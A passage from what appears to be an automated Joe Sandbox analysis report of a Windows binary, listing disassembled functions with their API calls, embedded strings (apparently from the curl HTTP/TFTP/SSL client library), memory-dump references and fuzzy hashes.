                                    • Instruction Fuzzy Hash: 4801C036602B23EFC7155F62E948108FB71FF04B22B14562BF54466AA1CB70B8E4CBD0
                                    Function 00E087A3 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000000,00E0D880), ref: 00E087AC
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 00E087B4
                                    • _getch.API-MS-WIN-CRT-CONIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 00E087C4
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002), ref: 00E087EF
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E087FB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfputs$_getch
                                    • String ID:
                                    • API String ID: 3073499726-0
                                    • Opcode ID: ba30c24f7e25f5d1fd08d135b4776fe89159b83911b6996e54344a46e411d575
                                    • Instruction ID: 39008b6c0bdb609a2bbbe7ed65bf91c2f33085538ea5c9aaad188a92f2269130
                                    • Opcode Fuzzy Hash: ba30c24f7e25f5d1fd08d135b4776fe89159b83911b6996e54344a46e411d575
                                    • Instruction Fuzzy Hash: 79F042335007515BC334132C5C09BA6AF54CF8170FF1C163BEAC8F218DC9950C8943A6
                                    Function 00E03A80 Relevance: 7.5, APIs: 6, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AA3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AB1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03ABD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AC9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AD5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AE7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: fca1d113035061acf65af7fc88bdb1775383de85eb496503603a234d51ee7166
                                    • Instruction ID: 133a7b27e23acd52601ce0ade66442550ad8370340f1c352c3b826e909164af4
                                    • Opcode Fuzzy Hash: fca1d113035061acf65af7fc88bdb1775383de85eb496503603a234d51ee7166
                                    • Instruction Fuzzy Hash: 9E012139602B009FCA355FA2D85492EBBF5AF44302300490DE89776A60C730A5599F91
                                    Function 00E0C72B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 278COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E1027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                      • Part of subcall function 00E1027A: __alldvrm.LIBCMT ref: 00E102A7
                                      • Part of subcall function 00E1027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E0C75B
                                      • Part of subcall function 00E16BA2: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,0000038F,?,00E0C775), ref: 00E16BC3
                                      • Part of subcall function 00E16BA2: WSACreateEvent.WS2_32 ref: 00E16C4D
                                    Strings
                                    • Transfer aborted due to critical error in another transfer, xrefs: 00E0C87D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CounterCreateEventPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_time64calloc
                                    • String ID: Transfer aborted due to critical error in another transfer
                                    • API String ID: 934473979-1939301410
                                    • Opcode ID: d12222ce37132521e02b8b6a566526c410fcf48cb5b93cd8ace4a13878574018
                                    • Instruction ID: bb4c6eaefecb72f594ec9bb3fd8872677d7bfbe3d696d54b3f5a5f34b92832ca
                                    • Opcode Fuzzy Hash: d12222ce37132521e02b8b6a566526c410fcf48cb5b93cd8ace4a13878574018
                                    • Instruction Fuzzy Hash: FDA1D571D042099FCF15CBA8C4547EDBBF1AF89308F2862AAE855B7291D7709E85CB90
                                    Function 00E2EA06 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 212COMMON
                                    Download Yara Rule
                                    APIs
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E2EAE7
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E2EB16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_pton
                                    • String ID: Hostname %s was found in DNS cache$localhost
                                    • API String ID: 1350483568-3522642687
                                    • Opcode ID: b8a41d52d22eae054e2584a5470ee69457cf27bbc47e3ed2c5ec75991d245e96
                                    • Instruction ID: de236bdda47d7c2cb56848c3fa374656550b9ef9518a1e273189659ebbe7b668
                                    • Opcode Fuzzy Hash: b8a41d52d22eae054e2584a5470ee69457cf27bbc47e3ed2c5ec75991d245e96
                                    • Instruction Fuzzy Hash: 3661D731A002399BDF25DF75E8956FEBBE6AF88324F14502AE805B7391DB705C41CB90
                                    Function 00E100C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E1012E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,internal error: invalid pattern type (%d),?), ref: 00E10224
                                    Strings
                                    • internal error: invalid pattern type (%d), xrefs: 00E1021D
                                    • %0*lu, xrefs: 00E1018E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcstrtoul
                                    • String ID: %0*lu$internal error: invalid pattern type (%d)
                                    • API String ID: 673873880-449433499
                                    • Opcode ID: b816ba1da8043f1e681aeaf09728a9251f432d3fa8c80f79fb39d11686b94a71
                                    • Instruction ID: 2d7885f55caa17b5e2f917f936a19f3ca9fb08556d72ed21e303b869bcba887f
                                    • Opcode Fuzzy Hash: b816ba1da8043f1e681aeaf09728a9251f432d3fa8c80f79fb39d11686b94a71
                                    • Instruction Fuzzy Hash: 8E512434A05305AFCF18CF64D894AEEBBB1AF08350F14516EE852B7382DBB499C5CB60
                                    Function 00E386B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,?,?), ref: 00E38704
                                    Strings
                                    • Received too short packet, xrefs: 00E3874C
                                    • Internal error: Unexpected packet, xrefs: 00E388AB
                                    • TFTP error: %s, xrefs: 00E38819
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                    • API String ID: 846543921-343195773
                                    • Opcode ID: d7cbdef40d61fc5566342bb75c6ddd370dfb31720e1949ce405373945c9cbae2
                                    • Instruction ID: 4e9a07cc98221f3a07b94d616a2a7442cdaf98b5b9a545e06c4c6cea1f1b92c4
                                    • Opcode Fuzzy Hash: d7cbdef40d61fc5566342bb75c6ddd370dfb31720e1949ce405373945c9cbae2
                                    • Instruction Fuzzy Hash: 9F51E5716002119FDB1C9A388E99BB9FBE5BF44314F445269F85EF6282DB34A944CB90
                                    Function 00E0E9EB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 00E0EA46
                                    • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?), ref: 00E0EAF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: isprintmalloc
                                    • String ID: \x%02x$blobpointer
                                    • API String ID: 3792030756-13518461
                                    • Opcode ID: a48df15ef17fa87281f31d3d7d13d5dd65df46365e2d1805aff8128995c9ac28
                                    • Instruction ID: 3398845211e3eb21fe775b55100db1f9bd932bc528ea80042117502bd0e22b53
                                    • Opcode Fuzzy Hash: a48df15ef17fa87281f31d3d7d13d5dd65df46365e2d1805aff8128995c9ac28
                                    • Instruction Fuzzy Hash: 6F412C39F042469EDB254F69A8406EABBB1BF18358F2C197AE4A5F33D1D6704D85CB10
                                    Function 00E0F653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                    Download Yara Rule
                                    APIs
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00E0F70B
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 00E0F738
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0F750
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupmallocrealloc
                                    • String ID: out of memory
                                    • API String ID: 178021264-2599737071
                                    • Opcode ID: 541de1f666dc5d9741deee2bff73761884a2dfeed26967f5854509bbd5531e92
                                    • Instruction ID: 0c544bdc3b43a7b46ad4fe8a58889d230aacf155bd101555159a5d653e8942f2
                                    • Opcode Fuzzy Hash: 541de1f666dc5d9741deee2bff73761884a2dfeed26967f5854509bbd5531e92
                                    • Instruction Fuzzy Hash: 7451BD78514202CFDB25CF38C4947A6BBF0FF05308F1894AAD84AEBB91D3719991CB51
                                    Function 00E40004 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E4020F,00E2EB2F,?), ref: 00E40075
                                    • htons.WS2_32(?), ref: 00E400ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callochtons
                                    • String ID: /
                                    • API String ID: 1862224338-1245174789
                                    • Opcode ID: 29dfe8fe04fcc724a1982fb7f644c7474348beb499c107dd566cf8e57b604cb4
                                    • Instruction ID: 82e5786b3f154b0262ad55a9c0b19c1eed43a2760c856fc246d15bcc582a4bf2
                                    • Opcode Fuzzy Hash: 29dfe8fe04fcc724a1982fb7f644c7474348beb499c107dd566cf8e57b604cb4
                                    • Instruction Fuzzy Hash: 11414B75A0060ADFDF08CF99D891AAEBBB1FF48314B14846ED905AB351D771EE41CB90
                                    Function 00E23A38 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23A7C
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23ABF
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23AE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: |l
                                    • API String ID: 601868998-4290992307
                                    • Opcode ID: 001549e5c97225225d8d556617dafdb444d65cb190637b8219a5000e8a68db81
                                    • Instruction ID: 299f0f5457f58595f4730c9dddf4377e786435905e44677db87d0ead0a9b4ae8
                                    • Opcode Fuzzy Hash: 001549e5c97225225d8d556617dafdb444d65cb190637b8219a5000e8a68db81
                                    • Instruction Fuzzy Hash: 0641E1B1A04366ABCF158FB9E4806ADFBF6AF81354B1461BAC881B3241DB785F418F50
                                    Function 00E153E9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00E15BA6,00000001), ref: 00E15428
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E15BA6,00000001), ref: 00E1543B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errnostrtoul
                                    • String ID: %u.%u.%u.%u$0kv@qv@/lv
                                    • API String ID: 660391088-3399269099
                                    • Opcode ID: d2d7c7da0ab15a17b4cddc95a982bc8f0100ea8f7f83634aba844e93f86ca596
                                    • Instruction ID: 66a59780a3e8b3ccc8da7d43e950eac26eecfb14c2261efe85db2803c8568e7b
                                    • Opcode Fuzzy Hash: d2d7c7da0ab15a17b4cddc95a982bc8f0100ea8f7f83634aba844e93f86ca596
                                    • Instruction Fuzzy Hash: 40412773C0050ADFCB249BA8E8145FEB7B7EB85319F54507EE05AB2181D2B48EC1DB61
                                    Function 00E46451 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E4657A
                                    Strings
                                    • SSL: public key does not match pinned public key, xrefs: 00E4653D
                                    • schannel: Failed to read remote certificate context: %s, xrefs: 00E46561
                                    • SSL: failed retrieving public key from server certificate, xrefs: 00E4654C
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CertCertificateContextFree
                                    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
                                    • API String ID: 3080675121-2322844371
                                    • Opcode ID: 1e0001dfbab570cb3997662f740557fac931613164d4370cfab42c5b1e3e8d14
                                    • Instruction ID: 9e1c0cc3357fda9adaa170fb6baf1acf48c532223ccb8bca25f20e2195647b00
                                    • Opcode Fuzzy Hash: 1e0001dfbab570cb3997662f740557fac931613164d4370cfab42c5b1e3e8d14
                                    • Instruction Fuzzy Hash: C631E131B0020A9FDB28DB29EC56BEA73E4AB41314F0454A9E409F7284EAB4ED848F51
                                    Function 00E019B1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000023,?,?,00000100,%*s,?,00E56DB0), ref: 00E01A92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: #$%*s$-=O=-
                                    • API String ID: 1795875747-742414071
                                    • Opcode ID: 9f05e8f470d3b85c7a47be68a3c03efff468be8bf7e07bcf9857b5491e7ffa4c
                                    • Instruction ID: 9a1f7d604bf005acaa3d727c6c99fb6b2245fa2757e8c1d60b8095a24f621c00
                                    • Opcode Fuzzy Hash: 9f05e8f470d3b85c7a47be68a3c03efff468be8bf7e07bcf9857b5491e7ffa4c
                                    • Instruction Fuzzy Hash: 8841E2707042448FDB48DF2DD884AD577F6AB58310F248AEAE889DB286D7B0DD98CF50
                                    Function 00E1F75D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1F7A7
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E1F7F9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F825
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfreestrncmp
                                    • String ID: 0)
                                    • API String ID: 3934053969-3456779764
                                    • Opcode ID: 9a294fce398dcd54cda4a4a2531e73c2e5a80c0e9b9d9dc88c328667fac66648
                                    • Instruction ID: 4e43d703c9f8802f13ba0828d3f0ea0e71c2fafd4a600b08bed04e3a0152b607
                                    • Opcode Fuzzy Hash: 9a294fce398dcd54cda4a4a2531e73c2e5a80c0e9b9d9dc88c328667fac66648
                                    • Instruction Fuzzy Hash: 5B217B37A04612AFCF195F28A8105FDBB65DF8275872461BAC841B3242DA715E8AC7E0
                                    Function 00E222EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E22326
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E22383
                                    Strings
                                    • Too old connection (%ld seconds since creation), disconnect it, xrefs: 00E223A3
                                    • Too old connection (%ld seconds idle), disconnect it, xrefs: 00E22342
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
                                    • API String ID: 885266447-3566769605
                                    • Opcode ID: 348eae075bac324a99f4ca32f9b304ac5ca6e856dfbda529b98d4f293c5c2b4c
                                    • Instruction ID: ecfe69137bcd398a01bdbab656db376f17d139f835ce5f46f41b950ecbbb1f08
                                    • Opcode Fuzzy Hash: 348eae075bac324a99f4ca32f9b304ac5ca6e856dfbda529b98d4f293c5c2b4c
                                    • Instruction Fuzzy Hash: 94112973E00A2177EB19FE395C46BAB769ACF46364F151068FE18BF281E4A65D0042D1
                                    Function 00E10320 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __alldvrm
                                    • String ID: "%s":$"%s":null$%I64u.%06I64u
                                    • API String ID: 65215352-1521088119
                                    • Opcode ID: 1304d24f0a2a0a0312ba9075c97f3f86c2a738bbdb4fc2336cc6dab63c19f48b
                                    • Instruction ID: 296b60765ebf71c5c99c90ec89873e3ba809797c80fbe4c230f74905f81389cd
                                    • Opcode Fuzzy Hash: 1304d24f0a2a0a0312ba9075c97f3f86c2a738bbdb4fc2336cc6dab63c19f48b
                                    • Instruction Fuzzy Hash: 6B11C371508304AFD701DF14DC42A9BBBE9FF54358F08551DF9A8A2161E3719DE09B81
                                    Function 00E109FA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?), ref: 00E10A4D
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
